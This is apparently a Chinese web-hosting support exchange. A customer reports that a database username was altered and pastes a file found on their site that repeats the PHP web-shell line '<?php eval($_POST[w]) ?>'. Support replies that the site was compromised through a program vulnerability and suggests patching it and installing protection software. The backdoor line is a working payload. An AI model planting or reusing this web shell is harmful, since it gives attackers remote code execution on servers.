问:前天服务器中的网站souluo360.cn数据库的用户名被人修改成aspnet,后面自己发现了又改回来,这是被入侵数据库造成的吗?
在服务器中的网站souluo360.cn里面的plus文件中发现了一份文件,目前已经删除了,类型如下:,打开后是这样:
<?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?>
请问这是什么东西,是别人上传的一句话木马吗,服务器数据库被修改同时被上传了东西
答:您好,
1、您描述的的问题是站点被挂马,站点被挂马是程序漏洞导致,要彻底解决需要联系程序商检查并修复程序漏洞;
2、如果您已经清理了挂马,可以在服务器上安装一个安全防护软件比如“云锁”,
云锁有设置防篡改功能,可以将之前被挂马的文件设置为防篡改,可以在一定程度避免再次被挂马;不过防护软件如果设置不当,也可能影响站点访问,因此在防护软件做设置时请您先阅读下防护软件的官方帮助文档;查看该服务器为亚数机房服务器,如果安装了云锁防护软件,需要将ip地址127.0.0.1、127.0.0.1、127.0.0.1加入云锁的ip白名单中;非常感谢您长期对我司的支持!